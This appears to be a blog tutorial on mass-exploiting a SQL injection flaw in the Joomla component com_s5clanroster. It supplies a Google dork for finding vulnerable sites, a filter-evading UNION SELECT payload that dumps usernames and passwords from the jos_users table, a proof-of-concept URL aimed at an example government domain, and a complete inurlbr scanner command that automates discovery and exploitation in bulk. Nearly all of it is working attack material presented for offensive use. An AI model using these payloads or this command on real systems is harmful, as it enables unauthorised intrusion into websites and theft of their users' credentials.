.png)
By
18:37
n this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.
The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.
DORK:
inurl:"index.php?option=com_s5clanroster"
SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-
POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}
With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr:
http://github.com/googleinurl/SCANNER-INURLBR
SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'
SET FILE OUTPUT:
-s vuln.log
SET TIPE VALIDATION:
-t 3
3 - The third type combine both first and second types:
Then, of course, it also establishes connection with the exploit through the get method
Demo: www.target.com.br{exploit}
SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}
Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.
Internal function - Converting strings in hexadecimal
hex Encrypt values in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Result inject:
http://www.target.gov.br/user?id=313032303330
--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'
SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If specific value is found in the target he is considered vulnerable.
Setting: -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get'/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
PRINT PROCESS:
0 yorum